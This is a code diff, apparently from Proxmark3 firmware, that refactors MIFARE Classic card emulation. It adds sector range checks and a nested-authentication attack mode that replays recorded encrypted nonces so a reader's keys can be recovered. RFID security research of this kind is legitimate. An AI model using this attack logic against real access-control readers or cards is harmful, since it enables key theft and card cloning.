+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed: case 0x02  - %02x", AC);
+            }
             break;
         }
         default:
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed: Error");
+            }
             return false;
     }
 
     switch (action) {
         case AC_DATA_READ: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed - AC_DATA_READ: OK");
+            }
             return ((keytype == AUTHKEYA && !(AC == 0x03 || AC == 0x05 || AC == 0x07))
                     || (keytype == AUTHKEYB && !(AC == 0x07)));
         }
         case AC_DATA_WRITE: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed - AC_DATA_WRITE: OK");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x00))
                     || (keytype == AUTHKEYB && (AC == 0x00 || AC == 0x04 || AC == 0x06 || AC == 0x03)));
         }
         case AC_DATA_INC: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed - AC_DATA_INC: OK");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x00))
                     || (keytype == AUTHKEYB && (AC == 0x00 || AC == 0x06)));
         }
         case AC_DATA_DEC_TRANS_REST: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("AC_DATA_DEC_TRANS_REST: OK");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x00 || AC == 0x06 || AC == 0x01))
                     || (keytype == AUTHKEYB && (AC == 0x00 || AC == 0x06 || AC == 0x01)));
         }
@@ -183,8 +201,23 @@ static bool IsAccessAllowed(uint8_t blockNo, uint8_t keytype, uint8_t action) {
     }
 }
 
-static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_t sak, tag_response_info_t **responses, uint32_t *cuid, uint8_t *uid_len, uint8_t **rats, uint8_t *rats_len) {
+static uint8_t MifareMaxSector(uint16_t flags) {
+    if (IS_FLAG_MF_SIZE(flags, MIFARE_MINI_MAX_BYTES)) {
+        return MIFARE_MINI_MAXSECTOR;
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_1K_MAX_BYTES)) {
+        return MIFARE_1K_MAXSECTOR;
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_2K_MAX_BYTES)) {
+        return MIFARE_2K_MAXSECTOR;
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_4K_MAX_BYTES)) {
+        return MIFARE_4K_MAXSECTOR;
+    } else {
+        return MIFARE_4K_MAXSECTOR;
+    }
+}
 
+bool MifareSimInit(uint16_t flags, uint8_t *uid, uint16_t atqa, uint8_t sak, tag_response_info_t **responses, uint32_t *cuid, uint8_t *uid_len, uint8_t **rats, uint8_t *rats_len) {
+
+    uint8_t uid_tmp[10] = {0};
     // SPEC: https://www.nxp.com/docs/en/application-note/AN10833.pdf
     // ATQA
     static uint8_t rATQA_Mini[]  = {0x04, 0x00};             // indicate Mifare classic Mini 4Byte UID
@@ -235,84 +268,86 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
     // Can be set from emulator memory or incoming data
     // Length: 4,7,or 10 bytes
 
-    // Get UID, SAK, ATQA from EMUL
-    if ((flags & FLAG_UID_IN_EMUL) == FLAG_UID_IN_EMUL) {
-        uint8_t block0[16];
-        emlGet(block0, 0, 16);
+    if (IS_FLAG_UID_IN_EMUL(flags)) {
 
-        // If uid size defined, copy only uid from EMUL to use, backward compatibility for 'hf_colin.c', 'hf_mattyrun.c'
-        if ((flags & (FLAG_4B_UID_IN_DATA | FLAG_7B_UID_IN_DATA | FLAG_10B_UID_IN_DATA)) != 0) {
-            memcpy(datain, block0, 10);  // load 10bytes from EMUL to the datain pointer. to be used below.
-        } else {
-            // Check for 4 bytes uid: bcc corrected and single size uid bits in ATQA
-            if ((block0[0] ^ block0[1] ^ block0[2] ^ block0[3]) == block0[4] && (block0[6] & 0xc0) == 0) {
-                flags |= FLAG_4B_UID_IN_DATA;
-                memcpy(datain, block0, 4);
-                rSAK[0] = block0[5];
-                memcpy(rATQA, &block0[6], sizeof(rATQA));
-            }
+        if (uid == NULL) {
+            uid = uid_tmp;
+        }
+        // Get UID, SAK, ATQA from EMUL
+        uint8_t block0[MIFARE_BLOCK_SIZE];
+        emlGet(block0, 0, MIFARE_BLOCK_SIZE);
+
+        // Check for 4 bytes uid: bcc corrected and single size uid bits in ATQA
+        if ((block0[0] ^ block0[1] ^ block0[2] ^ block0[3]) == block0[4] && (block0[6] & 0xc0) == 0) {
+            FLAG_SET_UID_IN_DATA(flags, 4);
+            memcpy(uid, block0, 4);
+            rSAK[0] = block0[5];
+            memcpy(rATQA, &block0[6], sizeof(rATQA));
+
+        } else if ((block0[8] & 0xc0) == 0x40) {
             // Check for 7 bytes UID: double size uid bits in ATQA
-            else if ((block0[8] & 0xc0) == 0x40) {
-                flags |= FLAG_7B_UID_IN_DATA;
-                memcpy(datain, block0, 7);
-                rSAK[0] = block0[7];
-                memcpy(rATQA, &block0[8], sizeof(rATQA));
-            } else {
-                Dbprintf("ERROR: " _RED_("Invalid dump. UID/SAK/ATQA not found"));
-                return false;
-            }
+            FLAG_SET_UID_IN_DATA(flags, 7);
+            memcpy(uid, block0, 7);
+            rSAK[0] = block0[7];
+            memcpy(rATQA, &block0[8], sizeof(rATQA));
+
+        } else {
+            Dbprintf("ERROR: " _RED_("Invalid dump. UID/SAK/ATQA not found"));
+            return false;
         }
 
+    } else {
+        if (uid == NULL) {
+            Dbprintf("ERROR: " _RED_("Missing UID"));
+            return false;
+        }
     }
 
     // Tune tag type, if defined directly
     // Otherwise use defined by default or extracted from EMUL
-    if ((flags & FLAG_MF_MINI) == FLAG_MF_MINI) {
+    if (IS_FLAG_MF_SIZE(flags, MIFARE_MINI_MAX_BYTES)) {
         memcpy(rATQA, rATQA_Mini, sizeof(rATQA));
         rSAK[0] = rSAK_Mini;
         if (g_dbglevel > DBG_NONE) Dbprintf("Enforcing Mifare Mini ATQA/SAK");
-    } else if ((flags & FLAG_MF_1K) == FLAG_MF_1K) {
+
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_1K_MAX_BYTES)) {
         memcpy(rATQA, rATQA_1k, sizeof(rATQA));
         rSAK[0] = rSAK_1k;
         if (g_dbglevel > DBG_NONE) Dbprintf("Enforcing Mifare 1K ATQA/SAK");
-    } else if ((flags & FLAG_MF_2K) == FLAG_MF_2K) {
+
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_2K_MAX_BYTES)) {
         memcpy(rATQA, rATQA_2k, sizeof(rATQA));
         rSAK[0] = rSAK_2k;
         *rats = rRATS;
         *rats_len = sizeof(rRATS);
         if (g_dbglevel > DBG_NONE) Dbprintf("Enforcing Mifare 2K ATQA/SAK with RATS support");
-    } else if ((flags & FLAG_MF_4K) == FLAG_MF_4K) {
+
+    } else if (IS_FLAG_MF_SIZE(flags, MIFARE_4K_MAX_BYTES)) {
         memcpy(rATQA, rATQA_4k, sizeof(rATQA));
         rSAK[0] = rSAK_4k;
         if (g_dbglevel > DBG_NONE) Dbprintf("Enforcing Mifare 4K ATQA/SAK");
     }
 
     // Prepare UID arrays
-    if ((flags & FLAG_4B_UID_IN_DATA) == FLAG_4B_UID_IN_DATA) { // get UID from datain
-        memcpy(rUIDBCC1, datain, 4);
+    if (IS_FLAG_UID_IN_DATA(flags, 4)) {
+        memcpy(rUIDBCC1, uid, 4);
         *uid_len = 4;
-        if (g_dbglevel >= DBG_EXTENDED)
-            Dbprintf("MifareSimInit - FLAG_4B_UID_IN_DATA => Get UID from datain: %02X - Flag: %02X - UIDBCC1: %02X", FLAG_4B_UID_IN_DATA, flags, rUIDBCC1);
-
-
         // save CUID
         *cuid = bytes_to_num(rUIDBCC1, 4);
         // BCC
         rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+        if (g_dbglevel >= DBG_EXTENDED)
+            Dbprintf("MifareSimInit - Flags: %04X - BCC1: %02X", flags, rUIDBCC1[4]);
         if (g_dbglevel > DBG_NONE) {
             Dbprintf("4B UID: %02x%02x%02x%02x", rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]);
         }
 
         // Correct uid size bits in ATQA
         rATQA[0] = (rATQA[0] & 0x3f); // single size uid
-
-    } else if ((flags & FLAG_7B_UID_IN_DATA) == FLAG_7B_UID_IN_DATA) {
-        memcpy(&rUIDBCC1[1], datain, 3);
-        memcpy(rUIDBCC2, datain + 3, 4);
+    } else if (IS_FLAG_UID_IN_DATA(flags, 7)) {
+        memcpy(&rUIDBCC1[1], uid, 3);
+        memcpy(rUIDBCC2, uid + 3, 4);
         *uid_len = 7;
-        if (g_dbglevel >= DBG_EXTENDED)
-            Dbprintf("MifareSimInit - FLAG_7B_UID_IN_DATA => Get UID from datain: %02X - Flag: %02X - UIDBCC1: %02X", FLAG_7B_UID_IN_DATA, flags, rUIDBCC1);
-
         // save CUID
         *cuid = bytes_to_num(rUIDBCC2, 4);
         // CascadeTag, CT
@@ -320,6 +355,8 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
         // BCC
         rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
         rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
+        if (g_dbglevel >= DBG_EXTENDED)
+            Dbprintf("MifareSimInit - Flags: %04X - BCC1: %02X - BCC2: %02X", flags, rUIDBCC1[4], rUIDBCC2[4]);
         if (g_dbglevel > DBG_NONE) {
             Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x",
                      rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3], rUIDBCC2[0], rUIDBCC2[1], rUIDBCC2[2], rUIDBCC2[3]);
@@ -327,15 +364,11 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
 
         // Correct uid size bits in ATQA
         rATQA[0] = (rATQA[0] & 0x3f) | 0x40; // double size uid
-
-    } else if ((flags & FLAG_10B_UID_IN_DATA) == FLAG_10B_UID_IN_DATA) {
-        memcpy(&rUIDBCC1[1], datain,   3);
-        memcpy(&rUIDBCC2[1], datain + 3, 3);
-        memcpy(rUIDBCC3,    datain + 6, 4);
+    } else if (IS_FLAG_UID_IN_DATA(flags, 10)) {
+        memcpy(&rUIDBCC1[1], uid,   3);
+        memcpy(&rUIDBCC2[1], uid + 3, 3);
+        memcpy(rUIDBCC3,    uid + 6, 4);
         *uid_len = 10;
-        if (g_dbglevel >= DBG_EXTENDED)
-            Dbprintf("MifareSimInit - FLAG_10B_UID_IN_DATA => Get UID from datain: %02X - Flag: %02X - UIDBCC1: %02X", FLAG_10B_UID_IN_DATA, flags, rUIDBCC1);
-
         // save CUID
         *cuid = bytes_to_num(rUIDBCC3, 4);
         // CascadeTag, CT
@@ -345,7 +378,8 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
         rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
         rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
         rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3];
-
+        if (g_dbglevel >= DBG_EXTENDED)
+            Dbprintf("MifareSimInit - Flags: %04X - BCC1: %02X - BCC2: %02X - BCC3: %02X", flags, rUIDBCC1[4], rUIDBCC2[4], rUIDBCC3[4]);
         if (g_dbglevel > DBG_NONE) {
             Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x",
                      rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3],
@@ -360,11 +394,11 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
         Dbprintf("ERROR: " _RED_("UID size not defined"));
         return false;
     }
-    if (flags & FLAG_FORCED_ATQA) {
+    if (flags & FLAG_ATQA_IN_DATA) {
         rATQA[0] = atqa >> 8;
         rATQA[1] = atqa & 0xff;
     }
-    if (flags & FLAG_FORCED_SAK) {
+    if (flags & FLAG_SAK_IN_DATA) {
         rSAK[0] = sak;
     }
     if (g_dbglevel > DBG_NONE) {
@@ -425,7 +459,7 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
     // 53 * 8 data bits, 53 * 1 parity bits, 18 start bits, 18 stop bits, 18 correction bits  ->   need 571 bytes buffer
 #define ALLOCATED_TAG_MODULATION_BUFFER_SIZE 571
 
-    uint8_t *free_buffer = BigBuf_malloc(ALLOCATED_TAG_MODULATION_BUFFER_SIZE);
+    uint8_t *free_buffer = BigBuf_calloc(ALLOCATED_TAG_MODULATION_BUFFER_SIZE);
     // modulation buffer pointer and current buffer free space size
     uint8_t *free_buffer_pointer = free_buffer;
     size_t free_buffer_size = ALLOCATED_TAG_MODULATION_BUFFER_SIZE;
@@ -453,16 +487,11 @@ static bool MifareSimInit(uint16_t flags, uint8_t *datain, uint16_t atqa, uint8_
 /**
 *MIFARE 1K simulate.
 *
-*@param flags :
-* FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
-* FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
-* FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
-* FLAG_10B_UID_IN_DATA - use 10-byte UID in the data-section not finished
-* FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later
+*@param flags: See pm3_cmd.h for the full definitions
 *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ...
-* (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
+* (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attempted)
 */
-void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint16_t atqa, uint8_t sak) {
+void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *uid, uint16_t atqa, uint8_t sak) {
     tag_response_info_t *responses;
     uint8_t cardSTATE = MFEMUL_NOFIELD;
     uint8_t uid_len = 0; // 4, 7, 10
@@ -473,6 +502,7 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
     uint8_t cardWRBL = 0;
     uint8_t cardAUTHSC = 0;
+    uint8_t cardMaxSEC = MifareMaxSector(flags);
     uint8_t cardAUTHKEY = AUTHKEYNONE;  // no authentication
     uint32_t cardRr = 0;
     uint32_t ans = 0;
@@ -496,28 +526,14 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
     uint8_t rats_len = 0;
 
 
-    // if fct is called with NULL we need to assign some memory since this pointer is passaed around
-    uint8_t datain_tmp[10] = {0};
-    if (datain == NULL) {
-        datain = datain_tmp;
-    }
-
     //Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
     // This will be used in the reader-only attack.
 
-    //allow collecting up to 7 sets of nonces to allow recovery of up to 7 keys
-#define ATTACK_KEY_COUNT 7 // keep same as define in cmdhfmf.c -> readerAttack() (Cannot be more than 7)
-    nonces_t ar_nr_resp[ATTACK_KEY_COUNT * 2]; // *2 for 2 separate attack types (nml, moebius) 36 * 7 * 2 bytes = 504 bytes
+    //allow collecting up to 16 sets of nonces to allow recovery of up to 16 keys
+#define ATTACK_KEY_COUNT 16
+    nonces_t ar_nr_resp[ATTACK_KEY_COUNT]; // for moebius attack type
     memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
 
-    uint8_t ar_nr_collected[ATTACK_KEY_COUNT * 2]; // *2 for 2nd attack type (moebius)
-    memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
-    uint8_t nonce1_count = 0;
-    uint8_t nonce2_count = 0;
-    uint8_t moebius_n_count = 0;
-    bool gettingMoebius = false;
-    uint8_t mM = 0; //moebius_modifier for collection storage
-
     // Authenticate response - nonce
     uint8_t rAUTH_NT[4] = {0, 0, 0, 1};
     uint8_t rAUTH_NT_keystream[4];
@@ -528,7 +544,7 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
     // free eventually allocated BigBuf memory but keep Emulator Memory
     BigBuf_free_keep_EM();
 
-    if (MifareSimInit(flags, datain, atqa, sak, &responses, &cuid, &uid_len, &rats, &rats_len) == false) {
+    if (MifareSimInit(flags, uid, atqa, sak, &responses, &cuid, &uid_len, &rats, &rats_len) == false) {
         BigBuf_free_keep_EM();
         return;
     }
@@ -547,12 +563,13 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
     int counter = 0;
     bool finished = false;
+    bool running_nested_auth_attack = false;
     bool button_pushed = BUTTON_PRESS();
     while ((button_pushed == false) && (finished == false)) {
 
         WDT_HIT();
 
-        if (counter == 3000) {
+        if (counter == 1000) {
             if (data_available()) {
                 Dbprintf("----------- " _GREEN_("BREAKING") " ----------");
                 break;
@@ -562,21 +579,6 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
             counter++;
         }
 
-        /*
-                // find reader field
-                if (cardSTATE == MFEMUL_NOFIELD) {
-
-                    vHf = (MAX_ADC_HF_VOLTAGE * SumAdc(ADC_CHAN_HF, 32)) >> 15;
-
-                    if (vHf > MF_MINFIELDV) {
-                        cardSTATE_TO_IDLE();
-                        LED_A_ON();
-                    }
-                    button_pushed = BUTTON_PRESS();
-                    continue;
-                }
-                */
-
         FpgaEnableTracing();
         //Now, get data
         int res = EmGetCmd(receivedCmd, sizeof(receivedCmd), &receivedCmd_len, receivedCmd_par);
@@ -743,10 +745,6 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
             // WORK
             case MFEMUL_WORK: {
 
-                if (g_dbglevel >= DBG_EXTENDED) {
-                    // Dbprintf("[MFEMUL_WORK] Enter in case");
-                }
-
                 if (receivedCmd_len == 0) {
                     if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] NO CMD received");
                     break;
@@ -791,12 +789,21 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
                     if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] KEY %c: %012" PRIx64, (cardAUTHKEY == 0) ? 'A' : 'B', emlGetKey(cardAUTHSC, cardAUTHKEY));
 
+                    // sector out of range - do not respond
+                    if ((cardAUTHSC >= cardMaxSEC) && (flags & FLAG_MF_ALLOW_OOB_AUTH) == 0) {
+                        cardAUTHKEY = AUTHKEYNONE; // not authenticated
+                        cardSTATE_TO_IDLE();
+                        if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] Out of range sector %d(0x%02x) >= %d(0x%02x)", cardAUTHSC, cardAUTHSC, cardMaxSEC, cardMaxSEC);
+                        LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
+                        break;
+                    }
+
                     // first authentication
                     crypto1_deinit(pcs);
 
                     // Load key into crypto
                     crypto1_init(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
-
+                    running_nested_auth_attack = false;
                     if (!encrypted_data) {
                         // Receive Cmd in clear txt
                         // Update crypto state (UID ^ NONCE)
@@ -820,9 +827,38 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                         ans = nonce ^ crypto1_word(pcs, cuid ^ nonce, 0);
                         num_to_bytes(ans, 4, rAUTH_AT);
                         */
-                        // rAUTH_NT, rAUTH_NT_keystream contains prepared nonce and keystream for nested authentication
-                        // we need calculate parity bits for non-encrypted sequence
-                        mf_crypto1_encryptEx(pcs, rAUTH_NT, rAUTH_NT_keystream, response, 4, response_par);
+
+                        // if key not known and FLAG_NESTED_AUTH_ATTACK and we have nt/nt_enc/parity, send recorded nt_enc and parity
+                        if ((flags & FLAG_NESTED_AUTH_ATTACK) == FLAG_NESTED_AUTH_ATTACK) {
+                            if (emlGetKey(cardAUTHSC, cardAUTHKEY) == 0) {
+                                uint8_t buf[MIFARE_BLOCK_SIZE] = {0};
+                                emlGetMem_xt(buf, (CARD_MEMORY_RF08S_OFFSET / MIFARE_BLOCK_SIZE) + cardAUTHSC, 1, MIFARE_BLOCK_SIZE);
+                                if (buf[(cardAUTHKEY * 8) + 3] == 0xAA) { // extra check to tell we have nt/nt_enc/par_err
+                                    running_nested_auth_attack = true;
+                                    // nt
+                                    nonce = bytes_to_num(buf + (cardAUTHKEY * 8), 2);
+                                    nonce = nonce << 16 | prng_successor(nonce, 16);
+                                    // nt_enc
+                                    memcpy(response, buf + (cardAUTHKEY * 8) + 4, 4);
+                                    uint8_t nt_par_err = buf[(cardAUTHKEY * 8) + 2];
+                                    uint32_t nt_enc = bytes_to_num(response, 4);
+                                    response_par[0] = ((((nt_par_err >> 3) & 1) ^ oddparity8((nt_enc >> 24) & 0xFF)) << 7 |
+                                                       (((nt_par_err >> 2) & 1) ^ oddparity8((nt_enc >> 16) & 0xFF)) << 6 |
+                                                       (((nt_par_err >> 1) & 1) ^ oddparity8((nt_enc >> 8) & 0xFF)) << 5 |
+                                                       (((nt_par_err >> 0) & 1) ^ oddparity8((nt_enc >> 0) & 0xFF)) << 4);
+                                    ar_nr_resp[0].cuid = cuid;
+                                    ar_nr_resp[0].sector = cardAUTHSC;
+                                    ar_nr_resp[0].keytype = cardAUTHKEY;
+                                    ar_nr_resp[0].nonce = nonce;
+                                    ar_nr_resp[0].nonce2 = nt_enc;
+                                };
+                            }
+                        }
+                        if (running_nested_auth_attack == false) {
+                            // rAUTH_NT, rAUTH_NT_keystream contains prepared nonce and keystream for nested authentication
+                            // we need calculate parity bits for non-encrypted sequence
+                            mf_crypto1_encryptEx(pcs, rAUTH_NT, rAUTH_NT_keystream, response, 4, response_par);
+                        }
                         EmSendCmdPar(response, 4, response_par);
                         FpgaDisableTracing();
 
@@ -893,14 +929,16 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
                     // Compliance of MIFARE Classic EV1 1K Datasheet footnote of Table 8
                     // If access bits show that key B is Readable, any subsequent memory access will be refused.
+                    // Some cards don't respect it so we can also skip it with FLAG_MF_USE_READ_KEYB
+                    if ((flags & FLAG_MF_USE_READ_KEYB) != FLAG_MF_USE_READ_KEYB) {
+                        if (cardAUTHKEY == AUTHKEYB && IsKeyBReadable(blockNo)) {
+                            EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
+                            FpgaDisableTracing();
 
-                    if (cardAUTHKEY == AUTHKEYB && IsKeyBReadable(blockNo)) {
-                        EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
-                        FpgaDisableTracing();
-
-                        if (g_dbglevel >= DBG_ERROR)
-                            Dbprintf("[MFEMUL_WORK] Access denied: Reader tried to access memory on authentication with key B while key B is readable in sector (0x%02x)", cardAUTHSC);
-                        break;
+                            if (g_dbglevel >= DBG_ERROR)
+                                Dbprintf("[MFEMUL_WORK] Access denied: Reader tried to access memory on authentication with key B while key B is readable in sector (0x%02x)", cardAUTHSC);
+                            break;
+                        }
                     }
                 }
 
@@ -923,7 +961,7 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                         // first block
                         if (blockNo == 4) {
 
-                            p_em += blockNo * 16;
+                            p_em += (blockNo * MIFARE_BLOCK_SIZE);
                             // TLV in NDEF, flip length between
                             //  4 | 03 21 D1 02 1C 53 70 91 01 09 54 02 65 6E 4C 69
                             // 0xFF means long length
@@ -938,7 +976,7 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                         }
                     }
 
-                    emlGetMem(response, blockNo, 1);
+                    emlGetMem_xt(response, blockNo, 1, MIFARE_BLOCK_SIZE);
 
                     if (g_dbglevel >= DBG_EXTENDED)  {
                         Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo,
@@ -978,13 +1016,13 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                         }
                     } else {
                         if (IsAccessAllowed(blockNo, cardAUTHKEY, AC_DATA_READ) == false) {
-                            memset(response, 0x00, 16); // datablock cannot be read
+                            memset(response, 0x00, MIFARE_BLOCK_SIZE); // datablock cannot be read
                             if (g_dbglevel >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK - IsAccessAllowed] Data block %d (0x%02x) cannot be read", blockNo, blockNo);
                         }
                     }
-                    AddCrc14A(response, 16);
-                    mf_crypto1_encrypt(pcs, response, MAX_MIFARE_FRAME_SIZE, response_par);
-                    EmSendCmdPar(response, MAX_MIFARE_FRAME_SIZE, response_par);
+                    AddCrc14A(response, MIFARE_BLOCK_SIZE);
+                    mf_crypto1_encrypt(pcs, response, MIFARE_BLOCK_SIZE + CRC16_SIZE, response_par);
+                    EmSendCmdPar(response, MIFARE_BLOCK_SIZE + CRC16_SIZE, response_par);
                     FpgaDisableTracing();
 
                     if (g_dbglevel >= DBG_EXTENDED) {
@@ -996,7 +1034,7 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                     numReads++;
 
                     if (exitAfterNReads > 0 && numReads == exitAfterNReads) {
-                        Dbprintf("[MFEMUL_WORK] %d reads done, exiting", numReads);
+                        Dbprintf("[MFEMUL_WORK] " _YELLOW_("%u") " reads done, exiting", numReads);
                         finished = true;
                     }
                     break;
@@ -1077,7 +1115,9 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
                 // case MFEMUL_WORK => CMD RATS
                 if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_RATS && (receivedCmd_dec[1] & 0xF0) <= 0x80 && (receivedCmd_dec[1] & 0x0F) <= 0x0e) {
+
                     if (rats && rats_len) {
+
                         if (encrypted_data) {
                             memcpy(response, rats, rats_len);
                             mf_crypto1_encrypt(pcs, response, rats_len, response_par);
@@ -1085,46 +1125,58 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                         } else {
                             EmSendCmd(rats, rats_len);
                         }
+
                         FpgaDisableTracing();
-                        if (g_dbglevel >= DBG_EXTENDED)
+
+                        if (g_dbglevel >= DBG_EXTENDED) {
                             Dbprintf("[MFEMUL_WORK] RCV RATS => ACK");
+                        }
+
                     } else {
                         EmSend4bit(encrypted_data ? mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA) : CARD_NACK_NA);
                         FpgaDisableTracing();
                         cardSTATE_TO_IDLE();
-                        if (g_dbglevel >= DBG_EXTENDED)
+                        if (g_dbglevel >= DBG_EXTENDED) {
                             Dbprintf("[MFEMUL_WORK] RCV RATS => NACK");
+                        }
                     }
                     break;
                 }
 
                 // case MFEMUL_WORK => ISO14443A_CMD_NXP_DESELECT
                 if (receivedCmd_len == 3 && receivedCmd_dec[0] == ISO14443A_CMD_NXP_DESELECT) {
+
                     if (rats && rats_len) {
+
                         // response back NXP_DESELECT
                         if (encrypted_data) {
                             memcpy(response, receivedCmd_dec, receivedCmd_len);
                             mf_crypto1_encrypt(pcs, response, receivedCmd_len, response_par);
                             EmSendCmdPar(response, receivedCmd_len, response_par);
-                        } else
+                        } else {
                             EmSendCmd(receivedCmd_dec, receivedCmd_len);
+                        }
 
                         FpgaDisableTracing();
-                        if (g_dbglevel >= DBG_EXTENDED)
+                        if (g_dbglevel >= DBG_EXTENDED) {
                             Dbprintf("[MFEMUL_WORK] RCV NXP DESELECT => ACK");
+                        }
+
                     } else {
                         EmSend4bit(encrypted_data ? mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA) : CARD_NACK_NA);
                         FpgaDisableTracing();
                         cardSTATE_TO_IDLE();
-                        if (g_dbglevel >= DBG_EXTENDED)
+                        if (g_dbglevel >= DBG_EXTENDED) {
                             Dbprintf("[MFEMUL_WORK] RCV NXP DESELECT => NACK");
+                        }
                     }
                     break;
                 }
 
                 // case MFEMUL_WORK => command not allowed
-                if (g_dbglevel >= DBG_EXTENDED)
+                if (g_dbglevel >= DBG_EXTENDED) {
                     Dbprintf("Received command not allowed, nacking");
+                }
                 EmSend4bit(encrypted_data ? mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA) : CARD_NACK_NA);
                 FpgaDisableTracing();
                 break;
@@ -1132,93 +1184,74 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
             // AUTH1
             case MFEMUL_AUTH1: {
-                if (g_dbglevel >= DBG_EXTENDED)
+                if (g_dbglevel >= DBG_EXTENDED) {
                     Dbprintf("[MFEMUL_AUTH1] Enter case");
+                }
 
                 if (receivedCmd_len != 8) {
                     cardSTATE_TO_IDLE();
